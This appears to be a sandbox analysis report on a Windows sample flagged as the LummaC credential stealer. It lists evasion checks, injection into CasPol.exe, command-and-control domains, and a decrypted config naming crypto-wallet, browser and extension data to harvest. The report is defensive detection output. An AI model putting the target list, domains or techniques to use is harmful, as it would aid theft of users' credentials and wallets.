Source: C:\Users\user\Desktop\BigProject.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32 Jump to behavior
Source: Window Recorder Window detected: More than 3 window changes detected
Source: BigProject.exe Static PE information: Virtual size of .text is bigger than: 0x100000
Source: BigProject.exe Static file information: File size 1600512 > 1048576
Source: BigProject.exe Static PE information: Raw size of .text is bigger than: 0x100000 < 0x16a800
Source: BigProject.exe Static PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Source: BigProject.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Uses code obfuscation techniques (call, push, ret)
Source: C:\Users\user\Desktop\BigProject.exe Code function: 0_2_00B4508F push esp; iretd 0_2_00B45090
Source: C:\Users\user\Desktop\BigProject.exe Code function: 0_2_00B460F2 pushad ; ret 0_2_00B460F3
Source: C:\Users\user\Desktop\BigProject.exe Code function: 0_2_00B450C3 pushad ; ret 0_2_00B450DF
Source: C:\Users\user\Desktop\BigProject.exe Code function: 0_2_00B44833 pushad ; ret 0_2_00B44834
Source: C:\Users\user\Desktop\BigProject.exe Code function: 0_2_00CA5860 push eax; ret 0_2_00CA587E
Source: C:\Users\user\Desktop\BigProject.exe Code function: 0_2_00B45847 pushad ; ret 0_2_00B45848
Source: C:\Users\user\Desktop\BigProject.exe Code function: 0_2_00B45980 pushad ; ret 0_2_00B4598A
Source: C:\Users\user\Desktop\BigProject.exe Code function: 0_2_00B46982 pushad ; ret 0_2_00B4699E
Source: C:\Users\user\Desktop\BigProject.exe Code function: 0_2_00B45909 push ebp; retf 0015h 0_2_00B4590A
Source: C:\Users\user\Desktop\BigProject.exe Code function: 0_2_00B452BA push ebp; retf 0_2_00B452BB
Source: C:\Users\user\Desktop\BigProject.exe Code function: 0_2_00B46234 pushad ; ret 0_2_00B46235
Source: C:\Users\user\Desktop\BigProject.exe Code function: 0_2_00B47248 pushad ; ret 0_2_00B47249
Source: C:\Users\user\Desktop\BigProject.exe Code function: 0_2_00B47364 pushad ; ret 0_2_00B4738B
Source: C:\Users\user\Desktop\BigProject.exe Code function: 0_2_00B45DB2 push esi; retn 0015h 0_2_00B45DB3
Source: C:\Users\user\Desktop\BigProject.exe Code function: 0_2_00B4359B pushad ; ret 0_2_00B4359C
Source: C:\Users\user\Desktop\BigProject.exe Code function: 0_2_00B446F1 pushad ; ret 0_2_00B446F2
Source: C:\Users\user\Desktop\BigProject.exe Code function: 0_2_00B43E46 pushad ; ret 0_2_00B43E47
Source: C:\Users\user\Desktop\BigProject.exe Code function: 0_2_00B44F9C pushad ; ret 0_2_00B44F9D
Source: C:\Users\user\Desktop\BigProject.exe Code function: 0_2_00B43F7F pushad ; ret 0_2_00B43F89
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 7_2_0043D810 push eax; mov dword ptr [esp], 707F7E0Dh 7_2_0043D812
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 7_2_00443469 push ebp; iretd 7_2_0044346C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 7_2_0044366E push 9F00CD97h; ret 7_2_004436B1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 7_2_0043AE30 push eax; mov dword ptr [esp], 1D1E1F10h 7_2_0043AE3E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 7_2_0044171E push esp; ret 7_2_0044171F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 7_2_004477A5 push ebp; iretd 7_2_004477AA
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Source: C:\Users\user\Desktop\BigProject.exe Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdate Jump to behavior
Source: C:\Users\user\Desktop\BigProject.exe Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot Jump to behavior
Source: C:\Users\user\Desktop\BigProject.exe Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot Jump to behavior
Source: C:\Users\user\Desktop\BigProject.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior

Malware Analysis System Evasion
barindex
Query firmware table information (likely to detect VMs)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe System information queried: FirmwareTableInformation Jump to behavior
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 7472 Thread sleep time: -120000s >= -30000s Jump to behavior
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
Source: C:\Users\user\Desktop\BigProject.exe Code function: 0_2_00C17458 GetSystemInfo, 0_2_00C17458
Source: CasPol.exe, 00000007.00000002.2450746382.0000000000CFD000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAWhf
Source: CasPol.exe, 00000007.00000002.2450746382.0000000000D3C000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAWJ?Q
Source: BigProject.exe, 00000000.00000002.2453321140.000000000113E000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAWH~
Source: BigProject.exe, 00000000.00000002.2453321140.00000000011A0000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 00000007.00000002.2450746382.0000000000D3C000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe Process information queried: ProcessInformation Jump to behavior
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 7_2_0043C1F0 LdrInitializeThunk, 7_2_0043C1F0
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Source: C:\Users\user\Desktop\BigProject.exe Code function: 0_2_00CA53A4 IsProcessorFeaturePresent,memset,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 0_2_00CA53A4
Source: C:\Users\user\Desktop\BigProject.exe Code function: 0_2_00CA53A4 IsProcessorFeaturePresent,memset,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 0_2_00CA53A4
Source: C:\Users\user\Desktop\BigProject.exe Code function: 0_2_00CA55FE SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 0_2_00CA55FE

HIPS / PFW / Operating System Protection Evasion
barindex
Allocates memory in foreign processes
Source: C:\Users\user\Desktop\BigProject.exe Memory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe base: 400000 protect: page execute and read and write Jump to behavior
Injects a PE file into a foreign processes
Source: C:\Users\user\Desktop\BigProject.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe base: 400000 value starts with: 4D5A Jump to behavior
LummaC encrypted strings found
Source: BigProject.exe, 00000000.00000003.2452421280.0000000003A21000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: rapeflowwj.lat
Source: BigProject.exe, 00000000.00000003.2452421280.0000000003A21000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: crosshuaht.lat
Source: BigProject.exe, 00000000.00000003.2452421280.0000000003A21000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: sustainskelet.lat
Source: BigProject.exe, 00000000.00000003.2452421280.0000000003A21000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: aspecteirs.lat
Source: BigProject.exe, 00000000.00000003.2452421280.0000000003A21000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: energyaffai.lat
Source: BigProject.exe, 00000000.00000003.2452421280.0000000003A21000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: necklacebudi.lat
Source: BigProject.exe, 00000000.00000003.2452421280.0000000003A21000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: discokeyus.lat
Source: BigProject.exe, 00000000.00000003.2452421280.0000000003A21000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: grannyejh.lat
Writes to foreign memory regions
Source: C:\Users\user\Desktop\BigProject.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe base: 400000 Jump to behavior
Source: C:\Users\user\Desktop\BigProject.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe base: 401000 Jump to behavior
Source: C:\Users\user\Desktop\BigProject.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe base: 440000 Jump to behavior
Source: C:\Users\user\Desktop\BigProject.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe base: 443000 Jump to behavior
Source: C:\Users\user\Desktop\BigProject.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe base: 452000 Jump to behavior
Source: C:\Users\user\Desktop\BigProject.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe base: 861008 Jump to behavior
Creates a process in suspended mode (likely to inject code)
Source: C:\Users\user\Desktop\BigProject.exe Process created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\user\AppData\Local\Temp\NavanItinerary.pdf" Jump to behavior
Source: C:\Users\user\Desktop\BigProject.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe" Jump to behavior
Queries the volume information (name, serial number etc) of a device
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\BigProject.exe Code function: 0_2_00CA5294 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter, 0_2_00CA5294
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid Jump to behavior
Adds / modifies Windows certificates
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Registry key created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8 Blob Jump to behavior
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct

Stealing of Sensitive Information
barindex
Yara detected LummaC Stealer
Source: Yara match File source: sslproxydump.pcap, type: PCAP
Source: Yara match File source: decrypted.memstr, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: CasPol.exe PID: 7404, type: MEMORYSTR
Found many strings related to Crypto-Wallets (likely being stolen)
Source: CasPol.exe, 00000007.00000002.2450915117.0000000000D93000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: top\\Local Storage\\leveldb","m":["*"],"z":"Wallets/Authy Desktop","d":2,"fs":20971520},{"t":0,"p":"%appdata%\\Bitcoin\\wallets","m":["*"],"z":"Wallets/Bitcoin core","d":2,"fs":20971520},{"t":0,"p":"%appdata%\\Binance","m":["app-store.json",".finger-print.fp","simple-storage.json","window-state.json"],"z":"Wallets/Binance","d":1,"fs":20971520},{"t":0,"p":"%appdata%\\com.liberty.jaxx\\IndexedDB","m":["*"],"z":"Wallets/JAXX New Version","d":2,"fs":20971520},{"t":0,"p":"%appdata%\\Electrum\\wallets","m":["*"],"z":"Wallets/Electrum","d":0,"fs":20971520},{"t":0,"p":"%appdata%\\Electrum-LTC\\wallets","m":["*"],"z":"Wallets/Electrum-LTC","d":0,"fs":20971520},{"t":0,"p":"%appdata%\\ElectronCash\\wallets","m":["*"],"z":"Wallets/ElectronCash","d":0,"fs":20971520},{"t":0,"p":"%appdata%\\Guarda\\IndexedDB","m":["*"],"z":"Wallets/Guarda","d":2,"fs":20971520},{"t":0,"p":"%appdata%\\DashCore\\wallets","m":["*.dat"],"z":"Wallets/DashCore","d":1,"fs":20971520},{"t":0,"p":"%appdata%\\WalletWasabi\\Client\\Wallets","m":["*"],"z":"Wallets/Wasabi","d":0,"fs":20971520},{"t":0,"p":"%appdata%\\Daedalus Mainnet\\wallets","m":["she.*.sqlite"],"z":"Wallets/Daedalus","d":0,"fs":20971520},{"t":1,"p":"%localappdata%\\Google\\Chrome\\User Data","z":"Chrome","f":"Google Chrome","n":"chrome.exe","l":"chrome.dll"},{"t":1,"p":"%localappdata%\\Google\\Chrome Beta\\User Data","z":"Chrome Beta","f":"Google Chrome Beta","n":"chrome.exe","l":"chrome.dll"},{"t":1,"p":"%appdata%\\Opera Software\\Opera Stable","z":"Opera","n":"opera.exe"},{"t":1,"p":"%localappdata%\\Opera Software\\Opera Neon\\User Data","z":"Opera Neon"},{"t":1,"p":"%appdata%\\Opera Software\\Opera GX Stable","z":"Opera GX Stable","n":"opera.exe"},{"t":1,"p":"%localappdata%\\Microsoft\\Edge\\User Data","z":"Edge","f":"Microsoft Edge","n":"msedge.exe","l":"msedge.dll"},{"t":1,"p":"%localappdata%\\BraveSoftware\\Brave-Browser\\User Data","z":"Brave","f":"BraveSoftware Brave-Browser","n":"brave.exe","l":"chrome.dll"},{"t":1,"p":"%local
Source: CasPol.exe, 00000007.00000002.2450915117.0000000000D93000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: top\\Local Storage\\leveldb","m":["*"],"z":"Wallets/Authy Desktop","d":2,"fs":20971520},{"t":0,"p":"%appdata%\\Bitcoin\\wallets","m":["*"],"z":"Wallets/Bitcoin core","d":2,"fs":20971520},{"t":0,"p":"%appdata%\\Binance","m":["app-store.json",".finger-print.fp","simple-storage.json","window-state.json"],"z":"Wallets/Binance","d":1,"fs":20971520},{"t":0,"p":"%appdata%\\com.liberty.jaxx\\IndexedDB","m":["*"],"z":"Wallets/JAXX New Version","d":2,"fs":20971520},{"t":0,"p":"%appdata%\\Electrum\\wallets","m":["*"],"z":"Wallets/Electrum","d":0,"fs":20971520},{"t":0,"p":"%appdata%\\Electrum-LTC\\wallets","m":["*"],"z":"Wallets/Electrum-LTC","d":0,"fs":20971520},{"t":0,"p":"%appdata%\\ElectronCash\\wallets","m":["*"],"z":"Wallets/ElectronCash","d":0,"fs":20971520},{"t":0,"p":"%appdata%\\Guarda\\IndexedDB","m":["*"],"z":"Wallets/Guarda","d":2,"fs":20971520},{"t":0,"p":"%appdata%\\DashCore\\wallets","m":["*.dat"],"z":"Wallets/DashCore","d":1,"fs":20971520},{"t":0,"p":"%appdata%\\WalletWasabi\\Client\\Wallets","m":["*"],"z":"Wallets/Wasabi","d":0,"fs":20971520},{"t":0,"p":"%appdata%\\Daedalus Mainnet\\wallets","m":["she.*.sqlite"],"z":"Wallets/Daedalus","d":0,"fs":20971520},{"t":1,"p":"%localappdata%\\Google\\Chrome\\User Data","z":"Chrome","f":"Google Chrome","n":"chrome.exe","l":"chrome.dll"},{"t":1,"p":"%localappdata%\\Google\\Chrome Beta\\User Data","z":"Chrome Beta","f":"Google Chrome Beta","n":"chrome.exe","l":"chrome.dll"},{"t":1,"p":"%appdata%\\Opera Software\\Opera Stable","z":"Opera","n":"opera.exe"},{"t":1,"p":"%localappdata%\\Opera Software\\Opera Neon\\User Data","z":"Opera Neon"},{"t":1,"p":"%appdata%\\Opera Software\\Opera GX Stable","z":"Opera GX Stable","n":"opera.exe"},{"t":1,"p":"%localappdata%\\Microsoft\\Edge\\User Data","z":"Edge","f":"Microsoft Edge","n":"msedge.exe","l":"msedge.dll"},{"t":1,"p":"%localappdata%\\BraveSoftware\\Brave-Browser\\User Data","z":"Brave","f":"BraveSoftware Brave-Browser","n":"brave.exe","l":"chrome.dll"},{"t":1,"p":"%local
Source: CasPol.exe, 00000007.00000002.2450915117.0000000000D93000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: top\\Local Storage\\leveldb","m":["*"],"z":"Wallets/Authy Desktop","d":2,"fs":20971520},{"t":0,"p":"%appdata%\\Bitcoin\\wallets","m":["*"],"z":"Wallets/Bitcoin core","d":2,"fs":20971520},{"t":0,"p":"%appdata%\\Binance","m":["app-store.json",".finger-print.fp","simple-storage.json","window-state.json"],"z":"Wallets/Binance","d":1,"fs":20971520},{"t":0,"p":"%appdata%\\com.liberty.jaxx\\IndexedDB","m":["*"],"z":"Wallets/JAXX New Version","d":2,"fs":20971520},{"t":0,"p":"%appdata%\\Electrum\\wallets","m":["*"],"z":"Wallets/Electrum","d":0,"fs":20971520},{"t":0,"p":"%appdata%\\Electrum-LTC\\wallets","m":["*"],"z":"Wallets/Electrum-LTC","d":0,"fs":20971520},{"t":0,"p":"%appdata%\\ElectronCash\\wallets","m":["*"],"z":"Wallets/ElectronCash","d":0,"fs":20971520},{"t":0,"p":"%appdata%\\Guarda\\IndexedDB","m":["*"],"z":"Wallets/Guarda","d":2,"fs":20971520},{"t":0,"p":"%appdata%\\DashCore\\wallets","m":["*.dat"],"z":"Wallets/DashCore","d":1,"fs":20971520},{"t":0,"p":"%appdata%\\WalletWasabi\\Client\\Wallets","m":["*"],"z":"Wallets/Wasabi","d":0,"fs":20971520},{"t":0,"p":"%appdata%\\Daedalus Mainnet\\wallets","m":["she.*.sqlite"],"z":"Wallets/Daedalus","d":0,"fs":20971520},{"t":1,"p":"%localappdata%\\Google\\Chrome\\User Data","z":"Chrome","f":"Google Chrome","n":"chrome.exe","l":"chrome.dll"},{"t":1,"p":"%localappdata%\\Google\\Chrome Beta\\User Data","z":"Chrome Beta","f":"Google Chrome Beta","n":"chrome.exe","l":"chrome.dll"},{"t":1,"p":"%appdata%\\Opera Software\\Opera Stable","z":"Opera","n":"opera.exe"},{"t":1,"p":"%localappdata%\\Opera Software\\Opera Neon\\User Data","z":"Opera Neon"},{"t":1,"p":"%appdata%\\Opera Software\\Opera GX Stable","z":"Opera GX Stable","n":"opera.exe"},{"t":1,"p":"%localappdata%\\Microsoft\\Edge\\User Data","z":"Edge","f":"Microsoft Edge","n":"msedge.exe","l":"msedge.dll"},{"t":1,"p":"%localappdata%\\BraveSoftware\\Brave-Browser\\User Data","z":"Brave","f":"BraveSoftware Brave-Browser","n":"brave.exe","l":"chrome.dll"},{"t":1,"p":"%local
Source: CasPol.exe, 00000007.00000002.2450915117.0000000000D93000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: top\\Local Storage\\leveldb","m":["*"],"z":"Wallets/Authy Desktop","d":2,"fs":20971520},{"t":0,"p":"%appdata%\\Bitcoin\\wallets","m":["*"],"z":"Wallets/Bitcoin core","d":2,"fs":20971520},{"t":0,"p":"%appdata%\\Binance","m":["app-store.json",".finger-print.fp","simple-storage.json","window-state.json"],"z":"Wallets/Binance","d":1,"fs":20971520},{"t":0,"p":"%appdata%\\com.liberty.jaxx\\IndexedDB","m":["*"],"z":"Wallets/JAXX New Version","d":2,"fs":20971520},{"t":0,"p":"%appdata%\\Electrum\\wallets","m":["*"],"z":"Wallets/Electrum","d":0,"fs":20971520},{"t":0,"p":"%appdata%\\Electrum-LTC\\wallets","m":["*"],"z":"Wallets/Electrum-LTC","d":0,"fs":20971520},{"t":0,"p":"%appdata%\\ElectronCash\\wallets","m":["*"],"z":"Wallets/ElectronCash","d":0,"fs":20971520},{"t":0,"p":"%appdata%\\Guarda\\IndexedDB","m":["*"],"z":"Wallets/Guarda","d":2,"fs":20971520},{"t":0,"p":"%appdata%\\DashCore\\wallets","m":["*.dat"],"z":"Wallets/DashCore","d":1,"fs":20971520},{"t":0,"p":"%appdata%\\WalletWasabi\\Client\\Wallets","m":["*"],"z":"Wallets/Wasabi","d":0,"fs":20971520},{"t":0,"p":"%appdata%\\Daedalus Mainnet\\wallets","m":["she.*.sqlite"],"z":"Wallets/Daedalus","d":0,"fs":20971520},{"t":1,"p":"%localappdata%\\Google\\Chrome\\User Data","z":"Chrome","f":"Google Chrome","n":"chrome.exe","l":"chrome.dll"},{"t":1,"p":"%localappdata%\\Google\\Chrome Beta\\User Data","z":"Chrome Beta","f":"Google Chrome Beta","n":"chrome.exe","l":"chrome.dll"},{"t":1,"p":"%appdata%\\Opera Software\\Opera Stable","z":"Opera","n":"opera.exe"},{"t":1,"p":"%localappdata%\\Opera Software\\Opera Neon\\User Data","z":"Opera Neon"},{"t":1,"p":"%appdata%\\Opera Software\\Opera GX Stable","z":"Opera GX Stable","n":"opera.exe"},{"t":1,"p":"%localappdata%\\Microsoft\\Edge\\User Data","z":"Edge","f":"Microsoft Edge","n":"msedge.exe","l":"msedge.dll"},{"t":1,"p":"%localappdata%\\BraveSoftware\\Brave-Browser\\User Data","z":"Brave","f":"BraveSoftware Brave-Browser","n":"brave.exe","l":"chrome.dll"},{"t":1,"p":"%local
Source: CasPol.exe, 00000007.00000002.2450746382.0000000000CFD000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: \??\C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
Tries to harvest and steal browser information (history, passwords, etc)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbn Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchh Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjp Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cert9.db Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcellj Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbic Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcge Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfdd Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgpp Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihd Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcob Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpo Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cpojfbodiccabbabgimdeohkkpjfpbnf Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihoh Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclg Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cookies.sqlite Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkm Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoadd Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpa Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifb Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilc Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblb Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpi Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaad Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jiidiaalihmmhddjgbnbgdfflelocpak Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapac Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdaf Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnkno Jump to behavior
